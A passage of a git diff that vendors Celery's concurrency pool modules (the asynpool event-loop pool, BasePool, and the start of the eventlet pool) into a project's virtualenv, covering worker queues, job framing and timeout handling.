+ check_timeouts() + # cannot iterate and remove at the same time + pending_remove_fd = set() + for fd in outqueues: + iterate_file_descriptors_safely( + [fd], self.fileno_to_outq, self._flush_outqueue, + pending_remove_fd.add, fileno_to_outq, on_state_change + ) + try: + join_exited_workers(shutdown=True) + except WorkersJoined: + debug('result handler: all workers terminated') + return + outqueues.difference_update(pending_remove_fd) + + def _flush_outqueue(self, fd, remove, process_index, on_state_change): + try: + proc = process_index[fd] + except KeyError: + # process already found terminated + # this means its outqueue has already been processed + # by the worker lost handler. + return remove(fd) + + reader = proc.outq._reader + try: + setblocking(reader, 1) + except OSError: + return remove(fd) + try: + if reader.poll(0): + task = reader.recv() + else: + task = None + sleep(0.5) + except (OSError, EOFError): + return remove(fd) + else: + if task: + on_state_change(task) + finally: + try: + setblocking(reader, 0) + except OSError: + return remove(fd) + + +class AsynPool(_pool.Pool): + """AsyncIO Pool (no threads).""" + + ResultHandler = ResultHandler + Worker = Worker + + #: Set by :meth:`register_with_event_loop` after running the first time. + _registered_with_event_loop = False + + def WorkerProcess(self, worker): + worker = super().WorkerProcess(worker) + worker.dead = False + return worker + + def __init__(self, processes=None, synack=False, + sched_strategy=None, proc_alive_timeout=None, + *args, **kwargs): + self.sched_strategy = SCHED_STRATEGIES.get(sched_strategy, + sched_strategy) + processes = self.cpu_count() if processes is None else processes + self.synack = synack + # create queue-pairs for all our processes in advance. + self._queues = { + self.create_process_queues(): None for _ in range(processes) + } + + # inqueue fileno -> process mapping + self._fileno_to_inq = {} + # outqueue fileno -> process mapping + self._fileno_to_outq = {} + # synqueue fileno -> process mapping + self._fileno_to_synq = {} + + # We keep track of processes that haven't yet + # sent a WORKER_UP message. If a process fails to send + # this message within _proc_alive_timeout we terminate it + # and hope the next process will recover. + self._proc_alive_timeout = ( + PROC_ALIVE_TIMEOUT if proc_alive_timeout is None + else proc_alive_timeout + ) + self._waiting_to_start = set() + + # denormalized set of all inqueues. + self._all_inqueues = set() + + # Set of fds being written to (busy) + self._active_writes = set() + + # Set of active co-routines currently writing jobs. + self._active_writers = set() + + # Set of fds that are busy (executing task) + self._busy_workers = set() + self._mark_worker_as_available = self._busy_workers.discard + + # Holds jobs waiting to be written to child processes. + self.outbound_buffer = deque() + + self.write_stats = Counter() + + super().__init__(processes, *args, **kwargs) + + for proc in self._pool: + # create initial mappings, these will be updated + # as processes are recycled, or found lost elsewhere. 
+ self._fileno_to_outq[proc.outqR_fd] = proc + self._fileno_to_synq[proc.synqW_fd] = proc + + self.on_soft_timeout = getattr( + self._timeout_handler, 'on_soft_timeout', noop, + ) + self.on_hard_timeout = getattr( + self._timeout_handler, 'on_hard_timeout', noop, + ) + + def _create_worker_process(self, i): + worker_before_create_process.send(sender=self) + gc.collect() # Issue #2927 + return super()._create_worker_process(i) + + def _event_process_exit(self, hub, proc): + # This method is called whenever the process sentinel is readable. + self._untrack_child_process(proc, hub) + self.maintain_pool() + + def _track_child_process(self, proc, hub): + """Helper method determines appropriate fd for process.""" + try: + fd = proc._sentinel_poll + except AttributeError: + # we need to duplicate the fd here to carefully + # control when the fd is removed from the process table, + # as once the original fd is closed we cannot unregister + # the fd from epoll(7) anymore, causing a 100% CPU poll loop. + fd = proc._sentinel_poll = os.dup(proc._popen.sentinel) + # Safely call hub.add_reader for the determined fd + iterate_file_descriptors_safely( + [fd], None, hub.add_reader, + self._event_process_exit, hub, proc) + + def _untrack_child_process(self, proc, hub): + if proc._sentinel_poll is not None: + fd, proc._sentinel_poll = proc._sentinel_poll, None + hub.remove(fd) + os.close(fd) + + def register_with_event_loop(self, hub): + """Register the async pool with the current event loop.""" + self._result_handler.register_with_event_loop(hub) + self.handle_result_event = self._result_handler.handle_event + self._create_timelimit_handlers(hub) + self._create_process_handlers(hub) + self._create_write_handlers(hub) + + # Add handler for when a process exits (calls maintain_pool) + [self._track_child_process(w, hub) for w in self._pool] + # Handle_result_event is called whenever one of the + # result queues are readable. + iterate_file_descriptors_safely( + self._fileno_to_outq, self._fileno_to_outq, hub.add_reader, + self.handle_result_event, '*fd*') + + # Timers include calling maintain_pool at a regular interval + # to be certain processes are restarted. + for handler, interval in self.timers.items(): + hub.call_repeatedly(interval, handler) + + # Add on_poll_start to the event loop only once to prevent duplication + # when the Consumer restarts due to a connection error. + if not self._registered_with_event_loop: + hub.on_tick.add(self.on_poll_start) + self._registered_with_event_loop = True + + def _create_timelimit_handlers(self, hub): + """Create handlers used to implement time limits.""" + call_later = hub.call_later + trefs = self._tref_for_id = WeakValueDictionary() + + def on_timeout_set(R, soft, hard): + if soft: + trefs[R._job] = call_later( + soft, self._on_soft_timeout, R._job, soft, hard, hub, + ) + elif hard: + trefs[R._job] = call_later( + hard, self._on_hard_timeout, R._job, + ) + self.on_timeout_set = on_timeout_set + + def _discard_tref(job): + try: + tref = trefs.pop(job) + tref.cancel() + del tref + except (KeyError, AttributeError): + pass # out of scope + self._discard_tref = _discard_tref + + def on_timeout_cancel(R): + _discard_tref(R._job) + self.on_timeout_cancel = on_timeout_cancel + + def _on_soft_timeout(self, job, soft, hard, hub): + # only used by async pool. 
+ if hard: + self._tref_for_id[job] = hub.call_later( + hard - soft, self._on_hard_timeout, job, + ) + try: + result = self._cache[job] + except KeyError: + pass # job ready + else: + self.on_soft_timeout(result) + finally: + if not hard: + # remove tref + self._discard_tref(job) + + def _on_hard_timeout(self, job): + # only used by async pool. + try: + result = self._cache[job] + except KeyError: + pass # job ready + else: + self.on_hard_timeout(result) + finally: + # remove tref + self._discard_tref(job) + + def on_job_ready(self, job, i, obj, inqW_fd): + self._mark_worker_as_available(inqW_fd) + + def _create_process_handlers(self, hub): + """Create handlers called on process up/down, etc.""" + add_reader, remove_reader, remove_writer = ( + hub.add_reader, hub.remove_reader, hub.remove_writer, + ) + cache = self._cache + all_inqueues = self._all_inqueues + fileno_to_inq = self._fileno_to_inq + fileno_to_outq = self._fileno_to_outq + fileno_to_synq = self._fileno_to_synq + busy_workers = self._busy_workers + handle_result_event = self.handle_result_event + process_flush_queues = self.process_flush_queues + waiting_to_start = self._waiting_to_start + + def verify_process_alive(proc): + proc = proc() # is a weakref + if (proc is not None and proc._is_alive() and + proc in waiting_to_start): + assert proc.outqR_fd in fileno_to_outq + assert fileno_to_outq[proc.outqR_fd] is proc + assert proc.outqR_fd in hub.readers + error('Timed out waiting for UP message from %r', proc) + os.kill(proc.pid, 9) + + def on_process_up(proc): + """Called when a process has started.""" + # If we got the same fd as a previous process then we'll also + # receive jobs in the old buffer, so we need to reset the + # job._write_to and job._scheduled_for attributes used to recover + # message boundaries when processes exit. + infd = proc.inqW_fd + for job in cache.values(): + if job._write_to and job._write_to.inqW_fd == infd: + job._write_to = proc + if job._scheduled_for and job._scheduled_for.inqW_fd == infd: + job._scheduled_for = proc + fileno_to_outq[proc.outqR_fd] = proc + + # maintain_pool is called whenever a process exits. + self._track_child_process(proc, hub) + + assert not isblocking(proc.outq._reader) + + # handle_result_event is called when the processes outqueue is + # readable. + add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd) + + waiting_to_start.add(proc) + hub.call_later( + self._proc_alive_timeout, verify_process_alive, ref(proc), + ) + + self.on_process_up = on_process_up + + def _remove_from_index(obj, proc, index, remove_fun, callback=None): + # this remove the file descriptors for a process from + # the indices. we have to make sure we don't overwrite + # another processes fds, as the fds may be reused. + try: + fd = obj.fileno() + except OSError: + return + + try: + if index[fd] is proc: + # fd hasn't been reused so we can remove it from index. 
+ index.pop(fd, None) + except KeyError: + pass + else: + remove_fun(fd) + if callback is not None: + callback(fd) + return fd + + def on_process_down(proc): + """Called when a worker process exits.""" + if getattr(proc, 'dead', None): + return + process_flush_queues(proc) + _remove_from_index( + proc.outq._reader, proc, fileno_to_outq, remove_reader, + ) + if proc.synq: + _remove_from_index( + proc.synq._writer, proc, fileno_to_synq, remove_writer, + ) + inq = _remove_from_index( + proc.inq._writer, proc, fileno_to_inq, remove_writer, + callback=all_inqueues.discard, + ) + if inq: + busy_workers.discard(inq) + self._untrack_child_process(proc, hub) + waiting_to_start.discard(proc) + self._active_writes.discard(proc.inqW_fd) + remove_writer(proc.inq._writer) + remove_reader(proc.outq._reader) + if proc.synqR_fd: + remove_reader(proc.synq._reader) + if proc.synqW_fd: + self._active_writes.discard(proc.synqW_fd) + remove_reader(proc.synq._writer) + self.on_process_down = on_process_down + + def _create_write_handlers(self, hub, + pack=pack, dumps=_pickle.dumps, + protocol=HIGHEST_PROTOCOL): + """Create handlers used to write data to child processes.""" + fileno_to_inq = self._fileno_to_inq + fileno_to_synq = self._fileno_to_synq + outbound = self.outbound_buffer + pop_message = outbound.popleft + put_message = outbound.append + all_inqueues = self._all_inqueues + active_writes = self._active_writes + active_writers = self._active_writers + busy_workers = self._busy_workers + diff = all_inqueues.difference + add_writer = hub.add_writer + hub_add, hub_remove = hub.add, hub.remove + mark_write_fd_as_active = active_writes.add + mark_write_gen_as_active = active_writers.add + mark_worker_as_busy = busy_workers.add + write_generator_done = active_writers.discard + get_job = self._cache.__getitem__ + write_stats = self.write_stats + is_fair_strategy = self.sched_strategy == SCHED_STRATEGY_FAIR + revoked_tasks = worker_state.revoked + getpid = os.getpid + + precalc = {ACK: self._create_payload(ACK, (0,)), + NACK: self._create_payload(NACK, (0,))} + + def _put_back(job, _time=time.time): + # puts back at the end of the queue + if job._terminated is not None or \ + job.correlation_id in revoked_tasks: + if not job._accepted: + job._ack(None, _time(), getpid(), None) + job._set_terminated(job._terminated) + else: + # XXX linear lookup, should find a better way, + # but this happens rarely and is here to protect against races. + if job not in outbound: + outbound.appendleft(job) + self._put_back = _put_back + + # called for every event loop iteration, and if there + # are messages pending this will schedule writing one message + # by registering the 'schedule_writes' function for all currently + # inactive inqueues (not already being written to) + + # consolidate means the event loop will merge them + # and call the callback once with the list writable fds as + # argument. Using this means we minimize the risk of having + # the same fd receive every task if the pipe read buffer is not + # full. 
+ + def on_poll_start(): + # Determine which io descriptors are not busy + inactive = diff(active_writes) + + # Determine hub_add vs hub_remove strategy conditional + if is_fair_strategy: + # outbound buffer present and idle workers exist + add_cond = outbound and len(busy_workers) < len(all_inqueues) + else: # default is add when data exists in outbound buffer + add_cond = outbound + + if add_cond: # calling hub_add vs hub_remove + iterate_file_descriptors_safely( + inactive, all_inqueues, hub_add, + None, WRITE | ERR, consolidate=True) + else: + iterate_file_descriptors_safely( + inactive, all_inqueues, hub_remove) + self.on_poll_start = on_poll_start + + def on_inqueue_close(fd, proc): + # Makes sure the fd is removed from tracking when + # the connection is closed, this is essential as fds may be reused. + busy_workers.discard(fd) + try: + if fileno_to_inq[fd] is proc: + fileno_to_inq.pop(fd, None) + active_writes.discard(fd) + all_inqueues.discard(fd) + except KeyError: + pass + self.on_inqueue_close = on_inqueue_close + self.hub_remove = hub_remove + + def schedule_writes(ready_fds, total_write_count=None): + if not total_write_count: + total_write_count = [0] + # Schedule write operation to ready file descriptor. + # The file descriptor is writable, but that does not + # mean the process is currently reading from the socket. + # The socket is buffered so writable simply means that + # the buffer can accept at least 1 byte of data. + + # This means we have to cycle between the ready fds. + # the first version used shuffle, but this version + # using `total_writes % ready_fds` is about 30% faster + # with many processes, and also leans more towards fairness + # in write stats when used with many processes + # [XXX On macOS, this may vary depending + # on event loop implementation (i.e, select/poll vs epoll), so + # have to test further] + num_ready = len(ready_fds) + + for _ in range(num_ready): + ready_fd = ready_fds[total_write_count[0] % num_ready] + total_write_count[0] += 1 + if ready_fd in active_writes: + # already writing to this fd + continue + if is_fair_strategy and ready_fd in busy_workers: + # worker is already busy with another task + continue + if ready_fd not in all_inqueues: + hub_remove(ready_fd) + continue + try: + job = pop_message() + except IndexError: + # no more messages, remove all inactive fds from the hub. + # this is important since the fds are always writable + # as long as there's 1 byte left in the buffer, and so + # this may create a spinloop where the event loop + # always wakes up. + for inqfd in diff(active_writes): + hub_remove(inqfd) + break + + else: + if not job._accepted: # job not accepted by another worker + try: + # keep track of what process the write operation + # was scheduled for. + proc = job._scheduled_for = fileno_to_inq[ready_fd] + except KeyError: + # write was scheduled for this fd but the process + # has since exited and the message must be sent to + # another process. + put_message(job) + continue + cor = _write_job(proc, ready_fd, job) + job._writer = ref(cor) + mark_write_gen_as_active(cor) + mark_write_fd_as_active(ready_fd) + mark_worker_as_busy(ready_fd) + + # Try to write immediately, in case there's an error. + try: + next(cor) + except StopIteration: + pass + except OSError as exc: + if exc.errno != errno.EBADF: + raise + else: + add_writer(ready_fd, cor) + hub.consolidate_callback = schedule_writes + + def send_job(tup): + # Schedule writing job request for when one of the process + # inqueues are writable. 
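+            # Illustrative sketch of the framing used here, not part of the
+            # original code: each message is a 4-byte big-endian length prefix
+            # followed by the pickled payload, the same length-prefixed framing
+            # that ``ResultHandler._recv_message`` parses for results.
+            #
+            #     >>> from struct import pack, unpack_from
+            #     >>> payload = b'example'
+            #     >>> frame = pack('>I', len(payload)) + payload
+            #     >>> unpack_from('>i', frame)[0]
+            #     7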
+ body = dumps(tup, protocol=protocol) + body_size = len(body) + header = pack('>I', body_size) + # index 1,0 is the job ID. + job = get_job(tup[1][0]) + job._payload = memoryview(header), memoryview(body), body_size + put_message(job) + self._quick_put = send_job + + def on_not_recovering(proc, fd, job, exc): + logger.exception( + 'Process inqueue damaged: %r %r: %r', proc, proc.exitcode, exc) + if proc._is_alive(): + proc.terminate() + hub.remove(fd) + self._put_back(job) + + def _write_job(proc, fd, job): + # writes job to the worker process. + # Operation must complete if more than one byte of data + # was written. If the broker connection is lost + # and no data was written the operation shall be canceled. + header, body, body_size = job._payload + errors = 0 + try: + # job result keeps track of what process the job is sent to. + job._write_to = proc + send = proc.send_job_offset + + Hw = Bw = 0 + # write header + while Hw < 4: + try: + Hw += send(header, Hw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + # suspend until more data + errors += 1 + if errors > 100: + on_not_recovering(proc, fd, job, exc) + raise StopIteration() + yield + else: + errors = 0 + + # write body + while Bw < body_size: + try: + Bw += send(body, Bw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + # suspend until more data + errors += 1 + if errors > 100: + on_not_recovering(proc, fd, job, exc) + raise StopIteration() + yield + else: + errors = 0 + finally: + hub_remove(fd) + write_stats[proc.index] += 1 + # message written, so this fd is now available + active_writes.discard(fd) + write_generator_done(job._writer()) # is a weakref + + def send_ack(response, pid, job, fd): + # Only used when synack is enabled. + # Schedule writing ack response for when the fd is writable. + msg = Ack(job, fd, precalc[response]) + callback = promise(write_generator_done) + cor = _write_ack(fd, msg, callback=callback) + mark_write_gen_as_active(cor) + mark_write_fd_as_active(fd) + callback.args = (cor,) + add_writer(fd, cor) + self.send_ack = send_ack + + def _write_ack(fd, ack, callback=None): + # writes ack back to the worker if synack enabled. + # this operation *MUST* complete, otherwise + # the worker process will hang waiting for the ack. + header, body, body_size = ack[2] + try: + try: + proc = fileno_to_synq[fd] + except KeyError: + # process died, we can safely discard the ack at this + # point. + raise StopIteration() + send = proc.send_syn_offset + + Hw = Bw = 0 + # write header + while Hw < 4: + try: + Hw += send(header, Hw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + yield + + # write body + while Bw < body_size: + try: + Bw += send(body, Bw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + # suspend until more data + yield + finally: + if callback: + callback() + # message written, so this fd is now available + active_writes.discard(fd) + + def flush(self): + if self._state == TERMINATE: + return + # cancel all tasks that haven't been accepted so that NACK is sent + # if synack is enabled. + if self.synack: + for job in self._cache.values(): + if not job._accepted: + job._cancel() + + # clear the outgoing buffer as the tasks will be redelivered by + # the broker anyway. 
+ if self.outbound_buffer: + self.outbound_buffer.clear() + + self.maintain_pool() + + try: + # ...but we must continue writing the payloads we already started + # to keep message boundaries. + # The messages may be NACK'ed later if synack is enabled. + if self._state == RUN: + # flush outgoing buffers + intervals = fxrange(0.01, 0.1, 0.01, repeatlast=True) + + # TODO: Rewrite this as a dictionary comprehension once we drop support for Python 3.7 + # This dict comprehension requires the walrus operator which is only available in 3.8. + owned_by = {} + for job in self._cache.values(): + writer = _get_job_writer(job) + if writer is not None: + owned_by[writer] = job + + if not self._active_writers: + self._cache.clear() + else: + while self._active_writers: + writers = list(self._active_writers) + for gen in writers: + if (gen.__name__ == '_write_job' and + gen_not_started(gen)): + # hasn't started writing the job so can + # discard the task, but we must also remove + # it from the Pool._cache. + try: + job = owned_by[gen] + except KeyError: + pass + else: + # removes from Pool._cache + job.discard() + self._active_writers.discard(gen) + else: + try: + job = owned_by[gen] + except KeyError: + pass + else: + job_proc = job._write_to + if job_proc._is_alive(): + self._flush_writer(job_proc, gen) + + job.discard() + # workers may have exited in the meantime. + self.maintain_pool() + sleep(next(intervals)) # don't busyloop + finally: + self.outbound_buffer.clear() + self._active_writers.clear() + self._active_writes.clear() + self._busy_workers.clear() + + def _flush_writer(self, proc, writer): + fds = {proc.inq._writer} + try: + while fds: + if not proc._is_alive(): + break # process exited + readable, writable, again = _select( + writers=fds, err=fds, timeout=0.5, + ) + if not again and (writable or readable): + try: + next(writer) + except (StopIteration, OSError, EOFError): + break + finally: + self._active_writers.discard(writer) + + def get_process_queues(self): + """Get queues for a new process. + + Here we'll find an unused slot, as there should always + be one available when we start a new process. + """ + return next(q for q, owner in self._queues.items() + if owner is None) + + def on_grow(self, n): + """Grow the pool by ``n`` processes.""" + diff = max(self._processes - len(self._queues), 0) + if diff: + self._queues.update({ + self.create_process_queues(): None for _ in range(diff) + }) + + def on_shrink(self, n): + """Shrink the pool by ``n`` processes.""" + + def create_process_queues(self): + """Create new in, out, etc. queues, returned as a tuple.""" + # NOTE: Pipes must be set O_NONBLOCK at creation time (the original + # fd), otherwise it won't be possible to change the flags until + # there's an actual reader/writer on the other side. + inq = _SimpleQueue(wnonblock=True) + outq = _SimpleQueue(rnonblock=True) + synq = None + assert isblocking(inq._reader) + assert not isblocking(inq._writer) + assert not isblocking(outq._reader) + assert isblocking(outq._writer) + if self.synack: + synq = _SimpleQueue(wnonblock=True) + assert isblocking(synq._reader) + assert not isblocking(synq._writer) + return inq, outq, synq + + def on_process_alive(self, pid): + """Called when receiving the :const:`WORKER_UP` message. + + Marks the process as ready to receive work. 
+ """ + try: + proc = next(w for w in self._pool if w.pid == pid) + except StopIteration: + return logger.warning('process with pid=%s already exited', pid) + assert proc.inqW_fd not in self._fileno_to_inq + assert proc.inqW_fd not in self._all_inqueues + self._waiting_to_start.discard(proc) + self._fileno_to_inq[proc.inqW_fd] = proc + self._fileno_to_synq[proc.synqW_fd] = proc + self._all_inqueues.add(proc.inqW_fd) + + def on_job_process_down(self, job, pid_gone): + """Called for each job when the process assigned to it exits.""" + if job._write_to and not job._write_to._is_alive(): + # job was partially written + self.on_partial_read(job, job._write_to) + elif job._scheduled_for and not job._scheduled_for._is_alive(): + # job was only scheduled to be written to this process, + # but no data was sent so put it back on the outbound_buffer. + self._put_back(job) + + def on_job_process_lost(self, job, pid, exitcode): + """Called when the process executing job' exits. + + This happens when the process job' + was assigned to exited by mysterious means (error exitcodes and + signals). + """ + self.mark_as_worker_lost(job, exitcode) + + def human_write_stats(self): + if self.write_stats is None: + return 'N/A' + vals = list(self.write_stats.values()) + total = sum(vals) + + def per(v, total): + return f'{(float(v) / total) if v else 0:.2f}' + + return { + 'total': total, + 'avg': per(total / len(self.write_stats) if total else 0, total), + 'all': ', '.join(per(v, total) for v in vals), + 'raw': ', '.join(map(str, vals)), + 'strategy': SCHED_STRATEGY_TO_NAME.get( + self.sched_strategy, self.sched_strategy, + ), + 'inqueues': { + 'total': len(self._all_inqueues), + 'active': len(self._active_writes), + } + } + + def _process_cleanup_queues(self, proc): + """Called to clean up queues after process exit.""" + if not proc.dead: + try: + self._queues[self._find_worker_queues(proc)] = None + except (KeyError, ValueError): + pass + + @staticmethod + def _stop_task_handler(task_handler): + """Called at shutdown to tell processes that we're shutting down.""" + for proc in task_handler.pool: + try: + setblocking(proc.inq._writer, 1) + except OSError: + pass + else: + try: + proc.inq.put(None) + except OSError as exc: + if exc.errno != errno.EBADF: + raise + + def create_result_handler(self): + return super().create_result_handler( + fileno_to_outq=self._fileno_to_outq, + on_process_alive=self.on_process_alive, + ) + + def _process_register_queues(self, proc, queues): + """Mark new ownership for ``queues`` to update fileno indices.""" + assert queues in self._queues + b = len(self._queues) + self._queues[queues] = proc + assert b == len(self._queues) + + def _find_worker_queues(self, proc): + """Find the queues owned by ``proc``.""" + try: + return next(q for q, owner in self._queues.items() + if owner == proc) + except StopIteration: + raise ValueError(proc) + + def _setup_queues(self): + # this is only used by the original pool that used a shared + # queue for all processes. + self._quick_put = None + + # these attributes are unused by this class, but we'll still + # have to initialize them for compatibility. + self._inqueue = self._outqueue = \ + self._quick_get = self._poll_result = None + + def process_flush_queues(self, proc): + """Flush all queues. + + Including the outbound buffer, so that + all tasks that haven't been started will be discarded. + + In Celery this is called whenever the transport connection is lost + (consumer restart), and when a process is terminated. 
+ """ + resq = proc.outq._reader + on_state_change = self._result_handler.on_state_change + fds = {resq} + while fds and not resq.closed and self._state != TERMINATE: + readable, _, _ = _select(fds, None, fds, timeout=0.01) + if readable: + try: + task = resq.recv() + except (OSError, EOFError) as exc: + _errno = getattr(exc, 'errno', None) + if _errno == errno.EINTR: + continue + elif _errno == errno.EAGAIN: + break + elif _errno not in UNAVAIL: + debug('got %r while flushing process %r', + exc, proc, exc_info=1) + break + else: + if task is None: + debug('got sentinel while flushing process %r', proc) + break + else: + on_state_change(task) + else: + break + + def on_partial_read(self, job, proc): + """Called when a job was partially written to exited child.""" + # worker terminated by signal: + # we cannot reuse the sockets again, because we don't know if + # the process wrote/read anything from them, and if so we cannot + # restore the message boundaries. + if not job._accepted: + # job was not acked, so find another worker to send it to. + self._put_back(job) + writer = _get_job_writer(job) + if writer: + self._active_writers.discard(writer) + del writer + + if not proc.dead: + proc.dead = True + # Replace queues to avoid reuse + before = len(self._queues) + try: + queues = self._find_worker_queues(proc) + if self.destroy_queues(queues, proc): + self._queues[self.create_process_queues()] = None + except ValueError: + pass + assert len(self._queues) == before + + def destroy_queues(self, queues, proc): + """Destroy queues that can no longer be used. + + This way they can be replaced by new usable sockets. + """ + assert not proc._is_alive() + self._waiting_to_start.discard(proc) + removed = 1 + try: + self._queues.pop(queues) + except KeyError: + removed = 0 + try: + self.on_inqueue_close(queues[0]._writer.fileno(), proc) + except OSError: + pass + for queue in queues: + if queue: + for sock in (queue._reader, queue._writer): + if not sock.closed: + self.hub_remove(sock) + try: + sock.close() + except OSError: + pass + return removed + + def _create_payload(self, type_, args, + dumps=_pickle.dumps, pack=pack, + protocol=HIGHEST_PROTOCOL): + body = dumps((type_, args), protocol=protocol) + size = len(body) + header = pack('>I', size) + return header, body, size + + @classmethod + def _set_result_sentinel(cls, _outqueue, _pool): + # unused + pass + + def _help_stuff_finish_args(self): + # Pool._help_stuff_finished is a classmethod so we have to use this + # trick to modify the arguments passed to it. 
+ return (self._pool,) + + @classmethod + def _help_stuff_finish(cls, pool): + # pylint: disable=arguments-differ + debug( + 'removing tasks from inqueue until task handler finished', + ) + fileno_to_proc = {} + inqR = set() + for w in pool: + try: + fd = w.inq._reader.fileno() + inqR.add(fd) + fileno_to_proc[fd] = w + except OSError: + pass + while inqR: + readable, _, again = _select(inqR, timeout=0.5) + if again: + continue + if not readable: + break + for fd in readable: + fileno_to_proc[fd].inq._reader.recv() + sleep(0) + + @property + def timers(self): + return {self.maintain_pool: 5.0} diff --git a/env/Lib/site-packages/celery/concurrency/base.py b/env/Lib/site-packages/celery/concurrency/base.py new file mode 100644 index 00000000..1ce9a751 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/base.py @@ -0,0 +1,180 @@ +"""Base Execution Pool.""" +import logging +import os +import sys +import time +from typing import Any, Dict + +from billiard.einfo import ExceptionInfo +from billiard.exceptions import WorkerLostError +from kombu.utils.encoding import safe_repr + +from celery.exceptions import WorkerShutdown, WorkerTerminate, reraise +from celery.utils import timer2 +from celery.utils.log import get_logger +from celery.utils.text import truncate + +__all__ = ('BasePool', 'apply_target') + +logger = get_logger('celery.pool') + + +def apply_target(target, args=(), kwargs=None, callback=None, + accept_callback=None, pid=None, getpid=os.getpid, + propagate=(), monotonic=time.monotonic, **_): + """Apply function within pool context.""" + kwargs = {} if not kwargs else kwargs + if accept_callback: + accept_callback(pid or getpid(), monotonic()) + try: + ret = target(*args, **kwargs) + except propagate: + raise + except Exception: + raise + except (WorkerShutdown, WorkerTerminate): + raise + except BaseException as exc: + try: + reraise(WorkerLostError, WorkerLostError(repr(exc)), + sys.exc_info()[2]) + except WorkerLostError: + callback(ExceptionInfo()) + else: + callback(ret) + + +class BasePool: + """Task pool.""" + + RUN = 0x1 + CLOSE = 0x2 + TERMINATE = 0x3 + + Timer = timer2.Timer + + #: set to true if the pool can be shutdown from within + #: a signal handler. + signal_safe = True + + #: set to true if pool uses greenlets. 
+ is_green = False + + _state = None + _pool = None + _does_debug = True + + #: only used by multiprocessing pool + uses_semaphore = False + + task_join_will_block = True + body_can_be_buffer = False + + def __init__(self, limit=None, putlocks=True, forking_enable=True, + callbacks_propagate=(), app=None, **options): + self.limit = limit + self.putlocks = putlocks + self.options = options + self.forking_enable = forking_enable + self.callbacks_propagate = callbacks_propagate + self.app = app + + def on_start(self): + pass + + def did_start_ok(self): + return True + + def flush(self): + pass + + def on_stop(self): + pass + + def register_with_event_loop(self, loop): + pass + + def on_apply(self, *args, **kwargs): + pass + + def on_terminate(self): + pass + + def on_soft_timeout(self, job): + pass + + def on_hard_timeout(self, job): + pass + + def maintain_pool(self, *args, **kwargs): + pass + + def terminate_job(self, pid, signal=None): + raise NotImplementedError( + f'{type(self)} does not implement kill_job') + + def restart(self): + raise NotImplementedError( + f'{type(self)} does not implement restart') + + def stop(self): + self.on_stop() + self._state = self.TERMINATE + + def terminate(self): + self._state = self.TERMINATE + self.on_terminate() + + def start(self): + self._does_debug = logger.isEnabledFor(logging.DEBUG) + self.on_start() + self._state = self.RUN + + def close(self): + self._state = self.CLOSE + self.on_close() + + def on_close(self): + pass + + def apply_async(self, target, args=None, kwargs=None, **options): + """Equivalent of the :func:`apply` built-in function. + + Callbacks should optimally return as soon as possible since + otherwise the thread which handles the result will get blocked. + """ + kwargs = {} if not kwargs else kwargs + args = [] if not args else args + if self._does_debug: + logger.debug('TaskPool: Apply %s (args:%s kwargs:%s)', + target, truncate(safe_repr(args), 1024), + truncate(safe_repr(kwargs), 1024)) + + return self.on_apply(target, args, kwargs, + waitforslot=self.putlocks, + callbacks_propagate=self.callbacks_propagate, + **options) + + def _get_info(self) -> Dict[str, Any]: + """ + Return configuration and statistics information. Subclasses should + augment the data as required. + + :return: The returned value must be JSON-friendly. + """ + return { + 'implementation': self.__class__.__module__ + ':' + self.__class__.__name__, + 'max-concurrency': self.limit, + } + + @property + def info(self): + return self._get_info() + + @property + def active(self): + return self._state == self.RUN + + @property + def num_processes(self): + return self.limit diff --git a/env/Lib/site-packages/celery/concurrency/eventlet.py b/env/Lib/site-packages/celery/concurrency/eventlet.py new file mode 100644 index 00000000..f9c9da7f --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/eventlet.py @@ -0,0 +1,181 @@ +"""Eventlet execution pool.""" +import sys +from time import monotonic + +from greenlet import GreenletExit +from kombu.asynchronous import timer as _timer + +from celery import signals + +from . import base + +__all__ = ('TaskPool',) + +W_RACE = """\ +Celery module with %s imported before eventlet patched\ +""" +RACE_MODS = ('billiard.', 'celery.', 'kombu.') + + +#: Warn if we couldn't patch early enough, +#: and thread/socket depending celery modules have already been loaded. 
+for mod in (mod for mod in sys.modules if mod.startswith(RACE_MODS)): + for side in ('thread', 'threading', 'socket'): # pragma: no cover + if getattr(mod, side, None): + import warnings + warnings.warn(RuntimeWarning(W_RACE % side)) + + +def apply_target(target, args=(), kwargs=None, callback=None, + accept_callback=None, getpid=None): + kwargs = {} if not kwargs else kwargs + return base.apply_target(target, args, kwargs, callback, accept_callback, + pid=getpid()) + + +class Timer(_timer.Timer): + """Eventlet Timer.""" + + def __init__(self, *args, **kwargs): + from eventlet.greenthread import spawn_after + from greenlet import GreenletExit + super().__init__(*args, **kwargs) + + self.GreenletExit = GreenletExit + self._spawn_after = spawn_after + self._queue = set() + + def _enter(self, eta, priority, entry, **kwargs): + secs = max(eta - monotonic(), 0) + g = self._spawn_after(secs, entry) + self._queue.add(g) + g.link(self._entry_exit, entry) + g.entry = entry + g.eta = eta + g.priority = priority + g.canceled = False + return g + + def _entry_exit(self, g, entry): + try: + try: + g.wait() + except self.GreenletExit: + entry.cancel() + g.canceled = True + finally: + self._queue.discard(g) + + def clear(self): + queue = self._queue + while queue: + try: + queue.pop().cancel() + except (KeyError, self.GreenletExit): + pass + + def cancel(self, tref): + try: + tref.cancel() + except self.GreenletExit: + pass + + @property + def queue(self): + return self._queue + + +class TaskPool(base.BasePool): + """Eventlet Task Pool.""" + + Timer = Timer + + signal_safe = False + is_green = True + task_join_will_block = False + _pool = None + _pool_map = None + _quick_put = None + + def __init__(self, *args, **kwargs): + from eventlet import greenthread + from eventlet.greenpool import GreenPool + self.Pool = GreenPool + self.getcurrent = greenthread.getcurrent + self.getpid = lambda: id(greenthread.getcurrent()) + self.spawn_n = greenthread.spawn_n + + super().__init__(*args, **kwargs) + + def on_start(self): + self._pool = self.Pool(self.limit) + self._pool_map = {} + signals.eventlet_pool_started.send(sender=self) + self._quick_put = self._pool.spawn + self._quick_apply_sig = signals.eventlet_pool_apply.send + + def on_stop(self): + signals.eventlet_pool_preshutdown.send(sender=self) + if self._pool is not None: + self._pool.waitall() + 